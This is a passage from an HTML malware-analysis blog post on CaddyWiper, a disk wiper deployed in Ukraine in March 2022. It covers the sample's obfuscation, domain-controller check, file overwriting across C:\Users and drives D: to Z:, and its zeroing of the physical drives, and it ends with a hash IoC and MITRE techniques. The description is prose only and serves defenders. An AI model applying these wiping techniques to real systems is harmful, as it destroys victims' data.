pre-wrap;">On March 14 2022 ESET research </span><a href="https://twitter.com/ESETresearch/status/1503436420886712321" style="text-decoration-line: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">found</span></a><span style="background-color: white; color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> a new disruptive malware deployed in Ukraine. It was called CandyWiper and it is already the third wiper that was found in the Ukrainian systems. The previous ones were WhisperGate and HermeticWiper. </span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">As well as the HermeticWiper, CaddyWiper was also deployed via Microsoft Active Directory GPO.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Technical Details</span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Overview</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The CaddyWiper sample was written in C++ and had compilation timestamp 14-03-2022, which matches with the day when it was deployed in the victim's system. This sample has only 10 functions.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 369px; overflow: hidden; width: 581px;"><img height="369" src="https://lh3.googleusercontent.com/YnjOocG8DN4xnSwyuzqYedF2OM44cDrqZGgZHpbUatdBgRUw2MFn4oPG53B0gTwgth8YDv50hj89IT8-2Mx7NuCBWBcjV16F90cphxUDNZka7Sq4zSsscif9ySx7G_CDwkrQYr8L" style="margin-left: 0px; margin-top: 0px;" width="581" /></span></span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Execution</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">All code in the sample is obfuscated in an interesting way. All strings are separated by one character. Even function calls are obfuscated in the same way, so malware has only one imported function and library, but others will be imported during execution.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 307px; overflow: hidden; width: 283px;"><img height="307" src="https://lh3.googleusercontent.com/CLSw1q-3eBbXSBxqFuFQ8bbTJx7aQLP7Prlv8pbFlBXI0rmB7Te6tRfMiPKieCYLFauEyi84yQ4B-r2WmeA5TEPCGti0zN_oJ-MzwkmNH7IlXF8z2tX4v9dmwbv4uELfa9z8Ayx2" style="margin-left: 0px; margin-top: 0px;" width="283" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CaddyWiper retrieves the machine role in the system using the ‘DsRoleGetPrimaryDomainInformation’ function. If the obtained value is ‘DsRole_RolePrimaryDomainController’, the wiper terminates its execution, if other, then it proceeds.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 314px; overflow: hidden; width: 451px;"><img height="314" src="https://lh6.googleusercontent.com/5UVnXiJKQutf7eUXGmjIyJCroNuFE6wgA7KCVNljHMPVfOr8pCNXCexmR0QooteOp5SUpllFkek7LkcmWrufof7seK9wYi4XuUDmNpk2DqhNuPCn5CPVjNqKhJ9m6QkMryCT7jTk" style="margin-left: 0px; margin-top: 0px;" width="451" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The first folder where CaddyWiper starts its operation is the “C:\Users”. File corruption routine is the ‘<i>sub_6522A0()</i>’ function. </span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span id="docs-internal-guid-810a655d-7fff-8106-42a2-aa030999230b"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 334px; overflow: hidden; width: 416px;"><img height="334" src="https://lh6.googleusercontent.com/qCn7S39V0pKw1At06rbXVl6GwURWi01lON0qXtCJQBnNsg2crrjXtIVWtKzPR59jmkesJU_bYL5wcDbjeakyWdPHhx5OLwDCl9Bz3L6ntWleQHx27La6axIELqr8Y5t5UABeR1HP" style="margin-left: 0px; margin-top: 0px;" width="416" /></span></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During ‘<i>sub_6522A0()</i>’ execution wiper loads and uses next functions:</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">FindFirstFileA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">FindNextFileA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CreateFileA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalAlloc</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">SetFilePointer</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">WriteFile</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalFree</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CloseHandle</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">FindClose</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">SetEntriesInAclA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">AllocateAndInitializeSid</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">SetNamedSecurityInfoA</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GetCurrentProcess</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">OpenProcessToken</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">FreeSid</span></p></li></ul><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">If the current file is used by another process, CaddyWiper obtains access to it using “SeTakeOwnershipPrivilege”. The first file in the system which CaddyWiper overwrites is ‘<i>C:\Users\desktop.ini’</i>. After overwriting this file the desktop background will be deleted and all shortcuts will be unusable. </span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 127px; overflow: hidden; width: 624px;"><img height="127" src="https://lh3.googleusercontent.com/1mHgGrGX8tXOjJLa-v_5SLiQq_egvlQEQjtPqsFRqospVmqdsN4E70EVm7AgRLoB_n0nbwD7Uqg0DjyAFVQgKzXX3GIxH9hVtaRC9dzYPK9VVUEC89HQtxDKI9CoLepfSgaepBTq" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 247px; overflow: hidden; width: 273px;"><img height="247" src="https://lh4.googleusercontent.com/3JQRD9R9-SkkkKFba5Fzza3Ci-eBibCE51Zrb96sbJL3UoofznIu_VdCIfOsQX_N3AIpEafvASuYGb7BdYKED8pme7mF9oP0EJb3TjWTkcdBn7NLhzzJ3VGPskfzo2tfqNyrDGoJ" style="margin-left: 0px; margin-top: 0px;" width="273" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After corrupting the ‘<i>C:\Users</i>’ folder, malware proceeds and goes to the ‘<i>D:\</i>’ logical drive. If it’s present, malware will corrupt its files in the same way as the previous one. This operation will be repeated for all logical drives from ‘<i>D:\</i>’ to ‘<i>Z:\</i>’. If these drives are missing or file corruption is done, it calls the ‘<i>sub_4011D0()</i>’ function, which will corrupt the disk partition.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 454px; overflow: hidden; width: 409px;"><img height="454" src="https://lh4.googleusercontent.com/G9Ah_YOTp0sVqsuI2ZkpSYLZHCOl0kCG759RiZT3q8Cva97pgQP-qBegcBhGGUpyMnQGqjzN6KMFUP4weWnaqKiyx2yXN-pBt9QBKKHU1wQSDqruvriJxApf8-cZGiF3EyryzK7V" style="margin-left: 0px; margin-top: 0px;" width="409" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">To perform disk corruption CaddyWiper obtains access to the disk partitions from ‘<i>\.\\\PHYSICALDRIVE9</i>’ to ‘<i>\.\\\PHYSICALDRIVE0</i>’ and performs overwriting the first 1920 bytes of data with ‘0’ using ‘CreateFileW’ and ‘DeviceIoControl’ functions. This operation can be done only if the malware was executed as administrator.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 250px; overflow: hidden; width: 287px;"><img height="250" src="https://lh4.googleusercontent.com/woHyA4vTl1Fr8yoGqn17xSEs6xi_Pa3xmjXe2ugX7hgFkt-WKJNUVvirjKRw1XjgfILWLlUeUy51-AqCU2JcP7V9F1e0m0EOdKLew3j72jHxgcy3NysAkBofn8ADeXu4hVg5zbss" style="margin-left: 0px; margin-top: 0px;" width="287" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Overwriting first 780h(1920 in decimal) bytes</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 335px; overflow: hidden; width: 434px;"><img height="335" src="https://lh6.googleusercontent.com/WYZzmSmK-eFYT7TNAK3BB7J5wx_IGUaV1Vopr-HM0uApoc-93Q_9VMztj540dZjMPXYnSFujTfalB91x5bvF0N_V4Yul_9VSSDo4She-_KBsd7fWovRX798P4jE0uL2tRLlVhG5A" style="margin-left: 0px; margin-top: 0px;" width="434" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After disk partitions are corrupted the machine will be rebooted, but the system won’t be started, instead the “<i>FATAL: INT18: BOOT FAILURE</i>” message will be shown on the screen.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 299px; overflow: hidden; width: 537px;"><img height="299" src="https://lh4.googleusercontent.com/LoTmyO1xW0CPMfE3nP0_H7u-W164atz7F0ErfL0kiXtvjjFqM7WbSn1ErUr256CKL8XgQ0lBR0nsEOpkUA-RP2huhFuvJKqtIylA8WFAVUWgoiVnSP7ummALH5lgJwaSKukIhc4L" style="margin-left: 0px; margin-top: 0px;" width="537" /></span></span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Obfuscation</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">All function calls and library names are separated in the PE file. Also, malware employs WinAPI calls obfuscation.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 353px; overflow: hidden; width: 524px;"><img height="353" src="https://lh6.googleusercontent.com/qStMUo5fJs7zp-vjJFJ3PsfcJXa2pT4ew-879AM7Oyvo1ZIBkEkilwUG_EV5eRrWhvhNvUrxJpn-wgUzQ7XXgsQ4SWsVaHB52Hbaa1ZCPxGAafW554bjHXHQx7X31w9-he0iC22S" style="margin-left: 0px; margin-top: 0px;" width="524" /></span></span></p><br /><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CaddyWiper continues the trend of data wipers in Ukraine. It is the third one found. The previous ones were <a href="https://www.nioguard.com/2022/01/analysis-of-whispergate.html" target="_blank">WhisperGate</a> and HermeticWiper. CaddyWiper doesn’t have any similarities with them, but as well as HermeticWiper, was deployed via Microsoft Active Directory GPO. The analyzed sample has obfuscated strings and API calls. It has two main disruptive functions, one of them corrupts files in the ‘<i>C:\Users</i>’ folder and logical drives from ‘<i>D:\</i>’ to ‘<i>Z:\</i>’, the second one overwrites disk partitions from ‘\.\\\PHYSICALDRIVE9’ to ‘\.\\\PHYSICALDRIVE0’. After the corruption process is done the system will be rebooted, but won’t be started.</span></p><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">IoCs </span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Files</span></h3><br /><div align="left" dir="ltr" style="margin-left: 3pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="114"></col><col width="482"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">File name</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">SHA256</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Roboto, sans-serif" style="font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">caddy1.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Roboto, sans-serif" style="color: #4d4d4d; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea</span></p></td></tr></tbody></table></div><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><br /><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">MITRE attack techniques</span></h3><br /><div align="left" dir="ltr" style="margin-left: 0.75pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="149"></col><col width="499"></col></colgroup><tbody><tr style="height: 33pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Tactic</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Technique</span></p></td></tr><tr style="height: 39.75pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Defense evasion</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1140/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1140 – Deobfuscate/Decode Files or Information</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1027/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1027 – Obfuscated Files or Information</span></a></p></td></tr><tr style="height: 43.7506pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovery</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 10pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1083/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1083 – File and Directory Discovery</span></a></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1082/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1082 - System Information 